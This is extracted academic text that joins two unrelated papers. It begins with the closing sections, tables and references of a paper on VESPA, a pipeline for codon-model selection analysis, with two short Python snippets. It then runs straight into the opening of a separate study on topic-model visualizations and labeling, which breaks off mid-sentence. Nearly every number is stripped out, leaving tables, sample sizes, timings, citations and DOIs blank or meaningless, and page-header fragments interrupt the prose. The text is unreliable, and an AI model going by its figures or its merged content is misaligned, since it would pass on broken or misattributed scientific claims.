table sample of a summary output file created by 'codeml_reader' in phase of the vespa package. one line is reported for each model tested: the site-specific models (m , m neutral, m selection, m discrtk, m , m and m a) run on the full alignment, and the lineage-site models (modela and modelanull) run with the primate ancestral, chimp and human lineages as foreground. the columns give the tree/lineage tested, the model type (homogeneous, site-specific or lineage-site), the number of free parameters (p), the initial w value (t = ), the log likelihood (lnl), the lrt result, the parameter estimates, whether positive selection was detected (yes/no/not allowed), and the positively selected sites in the alignment (p(w > ) > . ). in this sample family, positive selection was reported for one of the site-specific discrete models (with neb sites listed) and for modela with the chimp lineage as foreground (with beb sites listed); the remaining models reported either no positive selection or ''not allowed''.
notes. the following information is provided for each model tested: the lineage (internal or terminal branches) tested as foreground; the type of model (i.e., site-specific or branch-specific) being tested; the number of free parameters in the ω distribution that are estimated by codeml; the initial ω value used by codeml (each run within vespa has multiple starting values to minimise the risk of reporting from a local minimum on the likelihood plane); the resulting log likelihood (lnl) of the analysis; the resulting model of the likelihood ratio test (lrt); the parameter estimates of codeml; if positive selection was detected (yes/no); and the alignment coordinates for any positively selected sites. neb, naïve empirical bayes estimate and beb, bayes empirical bayes estimate.
table comparison of the results from gene families from the selectome database analysed in vespa. each row gives, for one gene family, the positive selection (modela) result and whether the positively selected sites matched, first for the original masked alignment and then for the alternative alignment.
atg l: yes (hpgponm), matched | yes (hpgponm, hp*, and hpg*), matched
atp sl: yes (hp), matched | yes (hp), matched
azgp: yes (hpgponm), matched | yes (hpgponm), matched / ( )
c orf: yes (hpg), matched | yes (hpg), matched
cacna i: yes (hp), matched | yes (hp), matched / ( , )
casp: yes (hpg), matched | yes (hpg), matched
cd: yes (hpg), matched | yes (hpg), matched
cobll: yes (hpgpon), matched | yes (hpgpon), matched
hus: yes (hpgponm), matched | yes (hpgponm), matched
idh b: yes (hp), matched | yes (hp), matched
ifit: yes (hpgponm), matched | yes (hpgponm), matched
ints: yes (hpgponm), matched | yes (hpgponm), matched
odc: yes (hpgpon), matched | yes (hpgpon), matched
pask: yes (hp), matched | yes (hp), matched / ( )
rrp: yes (hpgpon), matched | yes (hpgpon), matched
rtp: yes (hp), matched | yes (hp), matched
slc a: yes (pg), matched | yes (pg), matched
trim: yes (hpgpo), matched | yes (hpgpo), matched / ( , )
notes. *false positives. the homologous families chosen from the selectome database are given their hugo identifier on the left. the results of analysis in vespa as compared to selectome results using the same masked alignments are shown in columns and . the results from vespa using the alternative alignment method as compared to the original alignments are shown in columns and . for both alignments (original and alternative) it is indicated if modela positive selection is identified in the same lineages, and if the sites identified as positively selected match. using the alternative alignments, four cases where the sites identified as positively selected did not completely match the position in the original alignment are indicated in parenthesis. the extant lineages with evidence of positive selection throughout are shown in parentheses and are abbreviated as follows: human (h), chimp (p), gorilla (g), orangutan (po), gibbon (n) and macaque (m). ancestral nodes are denoted as a combination of the abbreviations for the extant lineages that the node includes, e.g. the ancestral node joining human (h) and chimp (p) is denoted as hp.
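the lnl values and lrt results summarised above come from comparing nested codon models. as a generic illustration, independent of vespa and with hypothetical numbers, the test amounts to comparing twice the log-likelihood difference against a chi-square distribution:

```python
from scipy.stats import chi2

def likelihood_ratio_test(lnl_null, lnl_alt, df):
    """Nested-model comparison: 2*(lnL_alt - lnL_null) is compared to chi-square with df degrees of freedom."""
    statistic = 2.0 * (lnl_alt - lnl_null)
    p_value = chi2.sf(statistic, df)
    return statistic, p_value

# Hypothetical log likelihoods for a nested model pair (a null model vs. a model allowing omega > 1).
stat, p = likelihood_ratio_test(lnl_null=-10234.7, lnl_alt=-10228.1, df=2)
print(f"LRT statistic = {stat:.2f}, p = {p:.4f}")
if p < 0.05:
    print("the alternative model is a significantly better fit")
```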
however, the results presented in table include small differences in the number and position of sites identified as positively selected. the atp sl alternative alignment was found to have evidence of positive selection on two additional branches as compared to the original result, however, closer inspection of the alternative alignments found the additional branches to be false positives due to a poorly aligned segment of the msa. other slight variations in results between the original and alternative alignments included three instances where gene families (c orf , cacna i, and pask) had a difference of one positively selected site and one instance (trim ) of differences in two positively selected sites reported in the original alignment that was not reported in the alternative alignment for the same family. finally, a single gene (slc a ) contained additional sites under positive selection following vespa analysis using the alternative alignments, it should be noted that these sites are within a poorly conserved span of the protein. the remaining genes were found to replicate the positively selected sites reported in selectome. to demonstrate the application of vespa to very large datasets we have assembled a novel dataset of , homologous gene families (each containing ≥ sequences) from the ensembl genome database (release ) (yates et al., ). using the vespa webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘clean_ensembl’’ command we: ( ) restricted the protein coding sequences per genome to the longest transcript for each gene, and ( ) logged and discarded sequences containing internal stop codons or incomplete codons. multiple sequence alignments were made for all gene families identified and phylogenies for each homologous gene families were inferred by vespa from the topology of the ensembl compara species tree demonstrating the flexibility of the vespa package (phase ). finally, the selective pressure analyses were carried out in vespa phase with human and then mouse labeled as the foreground lineages of interest. of the , genes analyzed by vespa showed evidence of site-specific positive selection (model ‘‘m ’’), genes showed evidence of mouse-specific positive selection (‘‘model a’’), and finally showed evidence of human-specific positive selection (‘‘model a’’); file s contains the full set of results. for the dataset of , homologous gene families the majority of vespa functions completed in under four minutes (on the following system: intel xeon cpu e ( . ghz), gb ram, using ubuntu os . ). the exceptions were the ’codeml_setup’ function which took approximately min for this dataset, this function is slightly slower as it is creating the complex directory/file structure for codeml. the second exception was the ’codeml reader’ function which took approximately h (this function is to analyze the large number of files created by codeml and produce the output and summary files). the codeml component of the analyses took , cpu hours in total to complete. (note: these time estimates are not inclusive of phase —homology search). discussion one of the primary goals of vespa is to simplify and streamline basic comparative genomic procedures such as filtering poor quality protein coding sequences and generating the most appropriate alignment for each gene family. vespa also simplifies and streamlines codeml-based selective pressure analyses. 
from our analysis of , homologous gene families we found that the majority of tasks could be completed within minutes using vespa. however, the codeml-related functions for creating the input file structure and examining the output files takes considerably longer to complete. as these functions are an essential aspect of the pipeline, decreasing their execution time will be a primary goal in future updates to vespa. two possible approaches that will be explored are: (i) increasing the overall efficiency of the functions and (ii) developing a version of vespa capable running these scripts (and possibly others) in parallel on multi-core processors. the modular nature of vespa enables the pipeline (or specific functions) to be used in conjunction with existing workflow systems. the only requirements would be having the necessary data (msas, protein-coding transcripts, etc.) in a supported format. for example, vespa could be used to perform a selective pressure analysis on protein-coding transcripts obtained from rna-seq. also, it is possible to skip specific stages of the vespa pipeline for a preferred approach/software package, e.g., it is possible to use an alternative approach for phylogenetic reconstruction and employ the resulting tree in a vespa analysis. it should also be possible to integrate the majority of vespa’s functions (with the exception of the built-in tree pruning function) into workflow systems such as galaxy (afgan et webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. al., ). this would allow vespa to operate in conjunction with the scripts and tools already available on galaxy, enabling greater freedom for the user. this integration will be implemented in future releases of vespa. we also employed vespa in the analysis of gene families from the selectome database (moretti et al., ). our initial comparison used both the alignment (masked) and tree provided by selectome. vespa was able to confirm the findings reported within the database. secondly, we re-aligned the gene families using two methods (muscle and prank) and then again performed the selective pressure analysis using vespa. the analysis of these alternative alignments revealed minor differences in the reported positively selected sites of five genes (c orf , cacna i, pask, slc a , and trim ). these differences illustrate that the input alignment may have an impact on the genes and sites identified as positively selected as in blackburne & whelan, ( ). to avoid biased results due to choice of alignment method and we highly recommend the use of the ‘‘metal_compare’’ function or programs such as aqua (muller et al., ) to select the best alignment for each gene family. conclusion vespa provides a flexible software package designed to simplify large-scale comparative genomic analyses and specifically selective pressure variation analysis implemented in codeml (yang, ). vespa automates the entire comparative genomic process from data quality checks and homology searching to phylogeny reconstruction and selective pressure analyses, and it produces simple summary files for the user. vespa offers users various functions that automate many of the required prerequisite analyses and removes error-prone data manipulation steps. 
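as a concrete illustration of the multi-core idea raised in the discussion above, the sketch below runs several prepared codeml task directories concurrently using only the python standard library. this is a hypothetical illustration rather than an existing vespa feature, and it assumes each directory already contains the codeml control file and inputs created by setup_codeml.

```python
import subprocess
from concurrent.futures import ProcessPoolExecutor
from pathlib import Path

def run_codeml(task_dir):
    """Run codeml inside a prepared task directory (it reads the control file found there)."""
    result = subprocess.run(["codeml"], cwd=task_dir, capture_output=True, text=True)
    return task_dir, result.returncode

def run_all(task_dirs, workers=4):
    """Execute several codeml tasks concurrently on a multi-core machine."""
    with ProcessPoolExecutor(max_workers=workers) as pool:
        for task_dir, code in pool.map(run_codeml, task_dirs):
            print(f"{task_dir}: {'ok' if code == 0 else 'failed'}")

if __name__ == "__main__":
    # Hypothetical layout: one sub-directory per gene family, created by setup_codeml.
    task_dirs = sorted(str(p) for p in Path("codeml_tasks").iterdir() if p.is_dir())
    run_all(task_dirs)
```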
lastly, it is important to note that the processes implemented in the phases of vespa facilitates those working on de novo sequence data or non-model organisms to perform large-scale comparative genomic analyses without having pre-processed gene families. all that is required by vespa is that the protein coding dna sequences are available. acknowledgements we would also like to thank louisse mirabueno (funded by the wellcome trust vacation scholarship programme) and other members of the community for their help in trouble- shooting, testing and providing feedback on the vespa software package and associated manual and tutorials. additional information and declarations funding this work was undertaken on marc , part of the high performance computing facilities at the university of leeds. the research was supported by science foundation ireland research frontiers programme grant (sfi rfp eob ) to mjo’c, and dcu pierse trust award and sobt awards (to taw and mjo’c) and the university of leeds webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. great minds academic fellowship to mjo’c. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: science foundation ireland research frontiers programme: sfi rfp eob . competing interests the authors have no competing interests. author contributions • andrew e. webb performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • thomas a. walsh performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • mary j. o’connell conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/aewebb /vespa. supplementary file (github): https://github.com/aewebb /vespa/blob/master/supplementaryfile .tar.bz . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references afgan e, baker d, van den beek m, blankenberg d, bouvier d, Čech m, chilton j, clements d, coraor n, eberhard c, grüning b, guerler a, hillman-jackson j, von kuster g, rasche e, soranzo n, turaga n, taylor j, nekrutenko a, goecks j. . the galaxy platform for accessible, reproducible and collaborative biomedical analy- ses: update. nucleic acids research (w ):w –w doi . /nar/gkw . altschul sf, madden tl, schaffer aa, zhang j, zhang z, miller w, lipman dj. . gapped blast and psi-blast: a new generation of protein database search programs. nucleic acids research ( ): – doi . /nar/ . . . alvarez-ponce d, aguade m, rozas j. . network-level molecular evolutionary analysis of the insulin/tor signal transduction pathway across drosophila genomes. genome research ( ): – doi . /gr. . . webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/aewebb /vespa https://github.com/aewebb /vespa/blob/master/supplementaryfile .tar.bz http://dx.doi.org/ . /peerj-cs. 
#supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /nar/gkw http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /peerj-cs. blackburne bp, whelan s. . class of multiple sequence alignment algorithm affects genomic analysis. molecular biology and evolution ( ): – doi . /molbev/mss . darriba d, taboada gl, doallo r, posada d. . prottest : fast selection of best-fit models of protein evolution. bioinformatics ( ): – doi . /bioinformatics/btr . delport w, poon af, frost sd, kosakovsky pond sl. . datamonkey : a suite of phylogenetic analysis tools for evolutionary biology. bioinformatics ( ): – doi . /bioinformatics/btq . eddy sr. . profile hidden markov models. bioinformatics ( ): – doi . /bioinformatics/ . . . edgar rc. . muscle: a multiple sequence alignment method with reduced time and space complexity. bmc bioinformatics : doi . / - - - . hongo ja, de castro gm, cintra lc, zerlotini a, lobo fp. . potion: an end- to-end pipeline for positive darwinian selection detection in genome-scale data through phylogenetic comparison of protein-coding genes. bmc genomics : doi . /s - - - . keane m, semeiks j, webb ae, li yi, quesada v, craig t, madsen lb, van dam s, brawand d, marques pi, michalak p, kang l, bhak j, yim hs, grishin nv, nielsen nh, heide-jorgensen mp, oziolor em, matson cw, church gm, stuart gw, patton jc, george jc, suydam r, larsen k, lopez-otin c, o’connell mj, bickham jw, thomsen b, de magalhaes jp. . insights into the evolu- tion of longevity from the bowhead whale genome. cell reports ( ): – doi . /j.celrep. . . . kim pm, korbel jo, gerstein mb. . positive selection at the protein network periphery: evaluation in terms of structural constraints and cellular context. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . kosiol c, vinar t, da fonseca rr, hubisz mj, bustamante cd, nielsen r, siepel a. . patterns of positive selection in six mammalian genomes. plos genetics ( ):e doi . /journal.pgen. . liu s, lorenzen ed, fumagalli m, li b, harris k, xiong z, zhou l, korneliussen ts, somel m, babbitt c, wray g, li j, he w, wang z, fu w, xiang x, morgan cc, doherty a, o’connell mj, mcinerney jo, born ew, dalen l, dietz r, orlando l, sonne c, zhang g, nielsen r, willerslev e, wang j. . population genomics reveal recent speciation and rapid evolutionary adaptation in polar bears. cell ( ): – doi . /j.cell. . . . loughran nb, hinde s, mccormick-hill s, leidal kg, bloomberg s, loughran st, o’connor b, o’fagain c, nauseef wa, o’connell mj. . functional consequence of positive selection revealed through rational mutagenesis of human myeloperoxidase. molecular biology and evolution ( ): – doi . /molbev/mss . webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /molbev/mss http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.celrep. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /journal.pgen. http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /molbev/mss http://dx.doi.org/ . /peerj-cs. loytynoja a, goldman n. . an algorithm for progressive multiple alignment of sequences with insertions. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . 
moretti s, laurenczy b, gharib wh, castella b, kuzniar a, schabauer h, studer ra, valle m, salamin n, stockinger h, robinson-rechavi m. . selectome update: quality control and computational improvements to a database of positive selection. nucleic acids research (database issue):d –d doi . /nar/gkt . muller j, creevey cj, thompson jd, arendt d, bork p. . aqua: automated quality improvement for multiple sequence alignments. bioinformatics ( ): – doi . /bioinformatics/btp . pond sl, frost sd, muse sv. . hyphy: hypothesis testing using phylogenies. bioinformatics ( ): – doi . /bioinformatics/bti . ronquist f, huelsenbeck jp. . mrbayes : bayesian phylogenetic inference under mixed models. bioinformatics ( ): – . doi . /bioinformatics/btg . swanson wj, yang z, wolfner mf, aquadro cf. . positive darwinian selection drives the evolution of several female reproductive proteins in mammals. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . webb ae, gerek zn, morgan cc, walsh ta, loscher ce, edwards sv, o’connell mj. . adaptive evolution as a predictor of species-specific innate immune response. molecular biology and evolution ( ): – doi . /molbev/msv . yang z. . paml : phylogenetic analysis by maximum likelihood. molecular biology and evolution ( ): – doi . /molbev/msm . yang z, dos reis m. . statistical properties of the branch-site test of positive selec- tion. molecular biology and evolution ( ): – doi . /molbev/msq . yates a, akanni w, amode mr, barrell d, billis k, carvalho-silva d, cummins c, clapham p, fitzgerald s, gil l, giron cg, gordon l, hourlier t, hunt se, janacek sh, johnson n, juettemann t, keenan s, lavidas i, martin fj, maurel t, mclaren w, murphy dn, nag r, nuhn m, parker a, patricio m, pignatelli m, rahtz m, riat hs, sheppard d, taylor k, thormann a, vullo a, wilder sp, zadissa a, birney e, harrow j, muffato m, perry e, ruffier m, spudich g, trevanion sj, cunningham f, aken bl, zerbino dr, flicek p. . ensembl . nucleic acids research (d ):d –d doi . /nar/gkv . webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /bioinformatics/btp http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /molbev/msv http://dx.doi.org/ . /molbev/msm http://dx.doi.org/ . /molbev/msq http://dx.doi.org/ . /nar/gkv http://dx.doi.org/ . /peerj-cs. evaluating visual representations for topic understanding and their effects on manually generated topic labels alison smith∗ tak yeon lee∗ forough poursabzi-sangdeh† jordan boyd-graber† niklas elmqvist∗ leah findlater∗ ∗university of maryland, college park, md †university of colorado, boulder, co {amsmit,tylee}@cs.umd.edu {forough.poursabzisangdeh, jordan.boyd.graber}@colorado.edu {elm,leahkf}@cs.umd.edu abstract probabilistic topic models are important tools for indexing, summarizing, and analyzing large document collections by their themes. however, promoting end-user understanding of topics remains an open research prob- lem. we compare labels generated by users given four topic visualization techniques— word lists, word lists with bars, word clouds, and network graphs—against each other and against automatically generated labels. our basis of comparison is participant ratings of how well labels describe documents from the topic. 
our study has two phases: a label- ing phase where participants label visualized topics and a validation phase where different participants select which labels best describe the topics’ documents. although all visual- izations produce similar quality labels, sim- ple visualizations such as word lists allow par- ticipants to quickly understand topics, while complex visualizations take longer but expose multi-word expressions that simpler visualiza- tions obscure. automatic labels lag behind user-created labels, but our dataset of man- ually labeled topics highlights linguistic pat- terns (e.g., hypernyms, phrases) that can be used to improve automatic topic labeling al- gorithms. comprehensible topic models needed a central challenge of the “big data” era is to help users make sense of large text collections (hotho et al., ). a common approach to summarizing the main themes in a corpus is to use topic models (blei, ), which are data-driven statistical models that identify words that appear together in similar docu- ments. these sets of words or “topics” evince inter- nal coherence and can help guide users to relevant documents. for instance, an fbi investigator sifting through the released hillary clinton e-mails may see a topic with the words “benghazi”, “libya”, “blu- menthal”, and “success”, spurring the investigator to dig deeper to find further evidence of inappro- priate communication with longtime friend sidney blumenthal regarding benghazi. a key challenge for topic modeling, however, is how to promote end-user understanding of individ- ual topics and the overall model. most existing topic presentations use simple word lists (chaney and blei, ; eisenstein et al., ). although a variety of alternative topic visualization techniques exist (sievert and shirley, ; yi et al., ), there has been no systematic assessment to compare them. beyond exploring different visualization tech- niques, another means of making topics easier for users to understand is to provide descriptive labels to complement a topic’s set of words (aletras et al., ). unfortunately, manual labeling is slow and, while automatic labeling approaches exist (lau et al., ; mei et al., ; lau et al., ), their effectiveness is not guaranteed for all tasks. to better understand these problems, we use la- beling to evaluate topic model visualizations. our study compares the impact of four commonly used topic visualization techniques on the labels that users create when interpreting a topic (figure ): word lists, word lists with bars, word clouds, and network graphs. on amazon mechanical turk, one set of users viewed a series of individual topic vi- transactions of the association for computational linguistics, vol. , pp. – , . action editor: timothy baldwin. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. sualizations and provided a label to describe each topic, while a second set of users assessed the qual- ity of those labels alongside automatically generated ones. better labels imply that the topic visualiza- tion provide users a more accurate interpretation (la- beling) of the topic. the four visualization techniques have inherent trade-offs. perhaps unsurprisingly, there is no mean- ingful difference in the quality of the labels pro- duced from the four visualization techniques. 
how- ever, simple visualizations (word list and word cloud) support a quick, first-glance understanding of topics, while more complex visualizations (net- work graph) take longer but reveal relationships be- tween words. also, user-created labels are better received than algorithmically-generated labels, but more detailed analysis uncovers features specific to high-quality labels (e.g., tendency towards abstrac- tion, inclusion of phrases) and the types of topics for which automatic labeling works. these findings motivate future automatic labeling algorithms. background presenting the full text of a document corpus is often impractical. for truly large and complex text cor- pora, abstractions, such as topic models, are neces- sary. here we review probabilistic topic modeling and topic model interfaces. . probabilistic topic modeling topic modeling algorithms produce statistical mod- els that discover key themes in documents (blei, ). many specific algorithms exist; in this work we use latent dirichlet allocation (blei et al., , lda) as it is commonly employed. lda is an un- supervised statistical topic modeling algorithm that considers each document to be a “bag of words” and can scale to large corpora (zhai et al., ; hoffman et al., ; smola and narayanamurthy, ). assuming that each document is an admix- ture of topics, inference discovers each topic’s dis- tribution over words and each document’s distribu- tion over topics that best explain the corpus. the set of topics provide a high-level overview of the cor- data available at https://github.com/ alisonmsmith/papers/tree/master/ topicrepresentations. pus, and individual topics can link back to the orig- inal documents to support directed exploration. the topic distributions can also be used to present other documents related to a given document. clustering is hard because there are multiple rea- sonable objectives that are impossible to satisfy si- multaneously (kleinberg, ). topic modeling evaluation has focused on perplexity, which mea- sures how well a model can predict words in un- seen documents (wallach et al., b; jelinek et al., ). however, chang et al. ( ) argue that eval- uations optimizing for perplexity encourage com- plexity at the cost of human interpretability. new- man et al. ( a) build on this insight, noting that “one indicator of usefulness is the ease by which one could think of a short label to describe the topic.” unlike previous interpretability studies, here we ex- amine the connection between a topic’s visual repre- sentation (not just its content) and its interpretabil- ity. recent work has focused on automatic generation of labels for topics. lau et al. ( ) use wikipedia articles to automatically label topics. the assump- tion is that for each topic there will be a wikipedia article title that offers a good representation of the topic. aletras et al. ( ) use a graph-based ap- proach to better rank candidate labels. they gen- erate a graph from the words in candidate articles and use pagerank to find a representative label. in section we use an adapted version of the method presented by lau et. al. ( ) as a representative automatic labeling algorithm. . topic model visualizations the topic visualization techniques in our study— word list, word list with bars, word cloud, and net- work graph—commonly appear in topic modeling tools. 
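before turning to the visualization tools surveyed next, the centroid-based labeling approach adapted from lau et al. (and described in more detail in the method section) can be sketched as scoring candidate article texts by cosine similarity to their average tf-idf vector and returning the closest title. the sketch uses scikit-learn rather than the lucene-based pipeline used in the study, and the candidate articles are hypothetical stand-ins for retrieved wikipedia results.

```python
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

def centroid_label(candidate_titles, candidate_texts):
    """Pick the candidate article whose tf-idf vector is closest to the centroid of all candidates."""
    tfidf = TfidfVectorizer().fit_transform(candidate_texts)
    centroid = np.asarray(tfidf.mean(axis=0))           # average tf-idf over retrieved articles
    scores = cosine_similarity(tfidf, centroid).ravel()
    return candidate_titles[int(scores.argmax())]

# Hypothetical candidates standing in for articles retrieved with a topic's top words.
titles = ["iraq war", "george w. bush", "2003 invasion of iraq"]
texts = ["the iraq war was a protracted armed conflict that began with the invasion ...",
         "george w. bush served as the 43rd president of the united states ...",
         "the 2003 invasion of iraq was the first stage of the iraq war ..."]
print(centroid_label(titles, texts))
```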
here, we provide an overview of tools that display an entire topic model or models to the user, while more detail on the individual topic visualiza- tion techniques can be found in section . . topical guide (gardner et al., ), topic viz (eisenstein et al., ), and the topic model visualization engine (chaney and blei, ) are tools that support corpus understanding and directed browsing through topic models. they display the model overview as an aggregate of underlying topic visualizations. for example, topical guide uses hor- https://github.com/alisonmsmith/papers/tree/master/topicrepresentations https://github.com/alisonmsmith/papers/tree/master/topicrepresentations https://github.com/alisonmsmith/papers/tree/master/topicrepresentations figure : examples of the twelve experimental conditions, each a different visualization of the same topic about the george w. bush presidential administration and the iraq war. rows represent cardinality, or number of topic words shown (five, ten, twenty). columns represent visualization techniques. for word list and word list with bars, topic words are ordered by their probability for the topic. word list with bars also includes horizontal bars to represent topic-term probabilities. in the word cloud, words are randomly placed but are sized according to topic-term probabilities. the network graph uses a force-directed layout algorithm to co-locate words that frequently appear together in the corpus. izontal word lists when displaying an overview of an entire topic model but uses a word cloud of the top words for a topic when displaying only a single topic. topic viz and the topic model visu- alization engine both represent topics with vertical word lists; the latter also uses set notation. other tools provide additional information within topic model overviews, such as the relationship be- tween topics or temporal changes in the model. however, they still require the user to understand individual topics. ldavis (sievert and shirley, ) includes information about the relationship between topics in the model. multi-dimensional scaling projects the model’s topics as circles onto a two-dimensional plane based on their inter-topic distances; the circles are sized by their overall preva- lence. the individual topics, however, are then vi- sualized on demand using a word list with bars. smith et al. ( ) visualize a topic model using a nested network graph layout called group-in-a- box (rodrigues et al., , gib). the individual topics are displayed using a network graph visu- alization, and related topics are displayed within a treemap (shneiderman, ) layout. the result is a visualization where related words cluster within top- ics and related topics cluster in the overall layout. topicflow (smith et al., ) visualizes how a model changes over time using a sankey dia- gram (riehmann et al., ). the individual top- ics are represented both as word lists in the model overview and as word list with bars when view- ing a single topic or comparing between two top- ics. argviz (nguyen et al., ) captures tempo- ral shifts in topics during a debate or a conversation. the individual topics are presented as word lists in the model overview and using word list with bars for the selected topics. klein et al. ( ) use a dust- and-magnet visualization (yi et al., ) to visu- alize the force of topics on newspaper issues. the temporal trajectories of several newspapers are dis- played as dust trails in the visualization. the indi- vidual topics are displayed as word clouds. 
in contrast to these visualizations which sup- port viewing the underlying topics on demand, ter- mite (chuang et al., ) uses a tabular layout of words and topics to provide an overview of the model to compare across topics. it organizes the model into clusters of related topics based on word overlap. this clustered representation is both space- efficient and speeds corpus understanding. despite the breadth of topic model visualizations, a small set of individual topic representations are ubiquitous: word list, word list with bars, word cloud, and network graph. in the following sections, we compare these topic visualization techniques. method: comparing visualizations we conduct a controlled online study to compare the four commonly used visualization techniques identi- fied in section : word list, word list with bars, word cloud, and network graph. we also compare effec- tiveness with the number of topic words shown, that is, the cardinality of the visualization: five, ten or twenty topic words. . dataset we select a corpus that does not assume domain ex- pertise: , new york times articles from january (sandhaus, ). we model the corpus using an lda (blei et al., ) implementation in mal- let (yao et al., ) with domain-specific stopwords and standard hyperparameter settings. our simple setup is by design: our goal is to emulate the “off the shelf” behavior of conventional topic modeling tools used by novice users. instead of improving the quality of the model using asymmetric priors (wal- lach et al., a) or bigrams (boyd-graber et al., ), our topic model has topics of variable qual- ity, allowing us to explore the relationship between topic quality and our task measures. automatic labels are generated from representa- tive wikipedia article titles using a technique sim- ilar to lau et al. ( ). we first index wikipedia using apache lucene. to label a topic, we query wikipedia with the top twenty topic words to re- trieve fifty articles. these articles’ titles comprise our candidate set of labels. we then represent each n= , α = . , β = . http://lucene.apache.org/ article using its tf-idf vector and calculate the cen- troid (average tf-idf) of the retrieved articles. to rank and choose the most representative of the set, we calculate the cosine similarity between the cen- troid tf-idf vector and the tf-idf vector of each of the articles. we choose the title of the article with the maximum cosine similarity to the centroid. un- like lau et al. ( ), we do not include the topic words or wikipedia title n-grams derived from our label set, as these labels are typically not the best candidates. although other automatic labeling tech- niques exist, we choose this one as it is representa- tive of general techniques. . visualizations as discussed in section , our study compares four of the most common topic visualization tech- niques. to produce a meaningful comparison, the space given to each visualization is held constant: × pixels. figure shows each visualiza- tion for the three cardinalities (or number of words displayed) for the same topic. word list the most straightforward topic repre- sentation is a list of the top n words in the topic, ranked by their probability. in practice, topic word lists have many variations. they can be represented horizontally (gardner et al., ; smith et al., ) or vertically (eisenstein et al., ; chaney and blei, ), with or without commas separating the individual words, or using set notation (chaney and blei, ). nguyen et al. 
( ) add the weights to the word list by sizing the words based on their probability for the topic, which blurs the boundary with word clouds; however, this approach is not common. we use a horizontal list of equally sized words ordered by the probability p(w|z) for the word w in the topic z. for space efficiency, we organize our word list in two columns and add item numbers to make the ordering explicit. word list with bars combining bar graphs with word lists yields a visual representation that not only conveys the ordering but also the absolute value of the weights associated with the words. we use a similar implementation to smith et al. ( ) to add horizontal bars to the word list for a topic z where the length of each bar represents the probability p(w|z) for each word w. http://lucene.apache.org/ figure : the labeling task for the network graph and ten words. users create a short label and full sentence describing the topic and rate their confidence that the label and sentence represent the topic well. word cloud the word cloud (or tag cloud) is one of the most popular and well-known text visualiza- tion techniques and is a common visualization for topics. many options exist for word cloud layout, color scheme, and font size (mueller, ). ex- isting work on layouts is split between those that size words by their frequency or probability for the topic (ramage et al., ) and those that size by the rank order of the word (barth et al., ). we use a combination of these techniques where the word’s font size is initially set proportional to its probabil- ity in a topic p(w|z). however, when the word is too large to fit in the canvas, the size is gradually decreased (barth et al., ). we use a gray scale to visually distinguish words and display all words horizontally to improve readability. network graph our most complex topic visual- ization is a network graph. we use a similar network graph implementation to smith et al. ( ), which represents each topic as a node-link diagram, where words are circular nodes with edges drawn between commonly co-occurring words. each word’s radius is scaled by the probability p(w|z) for the word w in a topic z. while smith et al. ( ) draw edges based on document-level co-occurrence, we instead use edges to pull together phrases, so they are drawn between words w and w based on bigram count, specifically if log(count(w ,w )) > k, with k = . . edge width and color are applied uniformly to fur- ther reduce complexity in the graph. the network graph is displayed using a force-directed graph lay- out algorithm (fruchterman and reingold, ) where all nodes repel each other but links attract connected nodes. . cardinality although every word has some probability for every topic, p(w|z), visualizations typically display only the top n words. the cardinality may interact with the effectiveness of the different visualization tech- niques (e.g., more complicated visualizations may degrade with more words). we use n ∈{ , , }. . task and procedure the study includes two phases with different users. in labeling (phase i), users describe a topic given a specific visualization, and we measure speed and self-reported confidence in completing the task. in validation (phase ii), users select the best and worst among a set of phase i descriptions and an automat- ically generated description for how well they repre- sent the original topics’ documents. phase i: labeling for each labeling task, users see a topic visualization, provide a short label (up from k ∈{ . , . , . , . 
}, we chose k = . as the best trade-off between complexity and provided information. figure : the validation task shows the titles of the top ten documents and five potential labels for a topic. users are asked to pick the best and worst labels. four labels were created by phase i users after viewing different visualizations of the topic, while the fifth was generated by the algorithm. the labels are shown in random order. to three words), then give a longer sentence to de- scribe the topic, and finally use a five-point likert scale to rate their confidence that the label and sen- tence represent the topic well. we also track the time to perform the task. figure shows an example of a labeling task using the network graph visualization technique with ten words. labeling tasks are randomly grouped into human intelligence tasks (hit) on mechanical turk such that each hit includes five tasks from the same vi- sualization technique. phase ii: validation in the validation phase, a new set of users assesses the quality of the labels and sentences created in phase i by evaluating them against documents associated with the given topic. it is important to evaluate the topic labels in con- text; a label that superficially looks good is useless if it is not representative of the underlying documents all users are in the us or canada, have more than fifty previously approved hits, and have an approval rating greater than %. we did not restrict users from performing multiple hits, which may have exposed them to multiple visualization tech- niques. users 